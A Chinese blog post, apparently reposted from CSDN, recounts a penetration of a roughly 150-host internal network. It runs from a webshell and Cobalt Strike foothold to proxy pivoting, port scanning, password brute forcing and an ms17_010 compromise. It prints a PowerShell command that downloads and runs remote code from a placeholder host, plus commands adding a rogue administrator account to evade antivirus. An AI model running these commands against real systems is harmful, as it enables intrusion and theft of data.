【安全渗透】淦!熬夜写完一次二层内网渗透

本文阅读 8 分钟

很久没有写点东西了,这次分享个二层内网的渗透过程,该内网约150台设备,工作组环境。

目录:

  • 01外部打点
  • 02边界突破
  • 03内网渗透-信息收集
  • 04内网渗透-拿下资产

01外部打点

入口点起源于弱口令+上传漏洞 img

当拿到上传漏洞之后,常规渗透途径 小马 -> 大马 -> 提权,条件允许的话个人更喜好大马,故直接上传了大马。 img

02边界突破

有了大马后,首先要做的为信息收集,信息收集大家都知道,渗透测试的关键都在于信息收集。

首先查看权限,为Administrator,其实也不用看,该网站为Tomcat,JSP网站,渗透多了基本知道网站权限为Administrator; img

其次查看网卡,发现为双网卡服务器,故可把该台主机当作跳板机; img

查看任务进程,查看任务进程的目的为判断服务器上是否存在杀毒软件,来进行下一步的渗透步骤,该台服务器由下图可以看出,无杀毒软件; img

查看网络连接,判断服务器开放端口以及相应服务。 img

信息只做浅谈,相应要做的信息收集肯定不止如上那些,收集了如上信息后,由于服务器无杀毒软件,故可直接CS上线,这里采用Powershell上线方式, 命令为: powershell.exe -nop -w hidden -c “IEX ((new-object net.webclient).downloadstring(‘http://xxx/a’))”

可直接上线; img

03内网渗透-信息收集

由之前的信息收集可得,已拿下的A主机为双网卡,故可做跳板机,那么可以通过它,扩大这次渗透的战果。

首先,收集内网存活主机,这里采用了K8的CS脚本Ladon,可收集内网存活主机,Target输入192.168.0.1/16可扫描B段; img

存活主机扫描完毕,149台主机内网存活,扫描了主机之后,下一步就是扫端口,用的为CS自带的端口扫描模块,Ports输入自定义端口 21-23,110,139,143,389,512-514,873,1080,1352,1433,1521,2049,2181,3306,3389,4848,5000,5432,5900,6379,7001,80-90,443,8000-9000,9090,9200,9300,11211,27017

CS自带的端口扫描模块截图: img

对扫描结果进行筛选,这里筛选结果如下: img

03内网渗透-拿下资产

在内网渗透之前,需要说下代理隧道,在这篇文章用得到的隧道为两种,分别为: 基于Windows平台:reGeorg+Proxifier 基于Kali平台:reGeorg+Proxychains

基于Windows平台:reGeorg+Proxifier reGeory为设置代理,命令如下: img

Proxifier为让本地流量过代理,需设置监听本地,且放过Python(即让Python流量不过代理),配置如下: img

基于Kali平台:reGeorg+Proxychains 跟Windows平台相同的为都用reGeorg做代理,因为reGeorg基于Python,Python在Windows上和Linux上都可安装运行,与Windows平台不同的是,Kali平台导入代理流量的工具是Proxychains,首先需在Proxychains.conf做配置,再在使用工具前加proxychains即可。

Proxychains配置如下,这里设置的为本地1080端口走代理: img

MSF走代理命令为: img

有人可能会问,CS已经上线,为什么不用CS代理呢,MSF干嘛不用MSF代理呢? 答:CS与MSF毕竟为渗透工具,代理模块用起来可以用,但都有各自的缺点,MSF不稳定,CS则速度慢,所以还是设置个其他代理渗透更顺手,这里reGeorg也可换成其他代理。

说了代理,之后就要聊聊如何进行内网渗透了,由内网信息收集,我们可获得大量内网主机端口信息,对这些信息进行分析,可分为如下三种类型进行渗透: Web应用(80、443、8080端口等); 数据库、主机应用(1433的MSSQL、3306的MYSQL、Windows的RDP、Linux的SSH等); 常规内网漏洞(MS17_010、0708等)。

Web应用 内网常用,SQL注入、命令执行(shiro,struct2等)、弱口令等。 拿下的Web应用部分截图如下: 某后台管理系统: img

某存储管理系统: img

某设备管理系统: img

数据库、主机应用 主要问题为弱口令,可通过超级弱口令检测工具、Hscan、Hydra等进行弱口令检测工具进行爆破。Tips:爆破的主要诀窍在于字典。

超级弱口令检测工具如下: img

Hscan如下: img

常规内网漏洞 之前的代理已经说了Proxychains msfconsole,该命令即为让MSF流量过代理,即在内网环境中。那么在内网环境中可使用MSF的ms170_10、0708等模块去进行相应渗透,msf为内网渗透神器,其内置大量渗透攻击模块,使用方式为 : 查询模块(Search) -> 选择模块(use) -> 查看使用方法(show options) -> 配置参数(set) -> 运行(run); img

在这就通过ms17_010打下了内网网站主服务器,多网站备份以及上万条资料都在其中。下面说下ms17_010打下该服务器的过程。

首先,刚才筛选出一份445端口存在的存活主机表,然后对这份存活主机表进行ms17_010扫描,发现某服务器存在ms17_010,发现存在后,尝试上线,可通过CS监听,MSF派生CS上线或者直接CS上线,发现无法上线,故用ms17_010command模块查看系统任务,估计存在杀毒软件,tasklist命令执行后,发现的确如此, img

ZhuDongFangYu,很熟悉的程序,说明该台服务器存在360,那么未免杀的木马则无法在该台服务器中运行,这里通过添加管理员账号+远程rdp连接的方式绕过该防护 set command net user administrator1 administrator1 /add set command net localgroup administrators administrator1 /add

执行后net user查看,发现administrator1已添加,那么接下来可直接连接3389端口的rdp了,已拿下该服务器,经过后期登录查看,发现多网站备份以及上万条资料都在其中。 img

写文章时发现有用户登录,不做登陆操作演示了。 img

总结:

看到这里的大佬,动动你们发财的小手三连一波~

我是一名渗透测试工程师,为了感谢读者们,我想把我收藏的一些干货贡献给大家,回馈每一个读者,希望能帮到你们。

  • 网络安全面试题(干货多多!!)
  • SRC技术文档
  • 渗透测试推荐书单
  • 工具包

点我资料获取

喜欢本文的小伙伴记得点赞+收藏哟~

本文为互联网自动采集或经作者授权后发布,本文观点不代表立场,若侵权下架请联系我们删帖处理!文章出自:https://blog.csdn.net/kali_Ma/article/details/117965144
-- 展开阅读全文 --
KillDefender 的 Beacon 对象文件 PoC 实现
« 上一篇 02-09
Web安全—逻辑越权漏洞(BAC)
下一篇 » 03-13

发表评论

成为第一个评论的人

热门文章

标签TAG

最近回复